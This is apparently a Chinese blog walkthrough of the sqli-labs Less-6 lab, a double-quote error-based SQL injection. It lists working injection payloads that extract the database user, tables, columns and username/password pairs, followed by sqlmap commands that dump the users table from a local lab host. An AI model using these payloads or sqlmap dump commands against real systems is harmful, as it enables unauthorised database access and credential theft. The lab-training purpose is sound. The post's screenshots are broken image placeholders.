【SQL注入攻击】GET-Double Injection-Double Quotes-String(双注入GET双引号字符型注入)

HackBar

观察页面

注入id=1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FSqF1x4q-1667376381131)(assets/image-20221102155048-fultn6o.png)]​

有正常的回显

判断注入点

注入id=1’

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1ZAnE5Mq-1667376381133)(assets/image-20221102155152-h00idzw.png)]​

正常回显了,说明跟单引号的闭合没有关系

注入id=1"

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MCup8HpZ-1667376381133)(assets/image-20221102155300-uehj1ea.png)]​

报错了,查看报错的信息,发现这个注入点跟双引号的闭合有关系

判断字段数

?id=1" order by 4 --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jb8Fth6P-1667376381134)(assets/image-20221102155435-hdk4ydp.png)]​

说明字段数为3

爆数据库用户

?id=-1" union select 1,count(*),concat((select user()),floor(rand()*9))as a from information_schema.tables group by a--+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XJqBYQYi-1667376381135)(assets/image-20221102155527-g7k2m7k.png)]​

爆数据库名

?id=1" union select count(*),2,concat('*',(select database()),'*',floor(rand()*2))as a from information_schema.tables group by a--+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WGVLndOF-1667376381136)(assets/image-20221102155629-oygfw8q.png)]​

爆数据库的数据表

?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*9))as a from information_schema.tables group by a--+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Z94VFFk8-1667376381137)(assets/image-20221102155730-v6cyye2.png)]​

爆数据库的数据表中的列名

?id=-1" union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qbljKr3y-1667376381138)(assets/image-20221102155843-blwhvsp.png)]​

ps:如果出现了正常回显,可能是还没有将信息注入,多按Execute就可以了

爆数据库的数据表中的字段名

?id=-1" union select count(*),1, concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NSW5TJRO-1667376381139)(assets/image-20221102160004-cfwxmwv.png)]​

sqlmap

sqlmap -u "http://0.0.0.0:8088/Less-6//?id=1" -batch

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WcY2DWAA-1667376381139)(assets/image-20221102160123-jhn8n0h.png)]​

爆数据库名

sqlmap -u "http://0.0.0.0:8088/Less-6//?id=1" -batch -dbs

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BwcU7xY1-1667376381140)(assets/image-20221102160241-j7rb53n.png)]​

爆数据表的字段

sqlmap -u "http://0.0.0.0:8088/Less-6//?id=1" -batch -T users --columns

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IX9t8Uiw-1667376381140)(assets/image-20221102160314-basfdw8.png)]​

爆数据库的所有内容

sqlmap -u "http://0.0.0.0:8088/Less-6//?id=1" -batch -D security -T users -C username,password -dump

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CcQjGYtY-1667376381141)(assets/image-20221102160459-ry3l9vv.png)]​

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值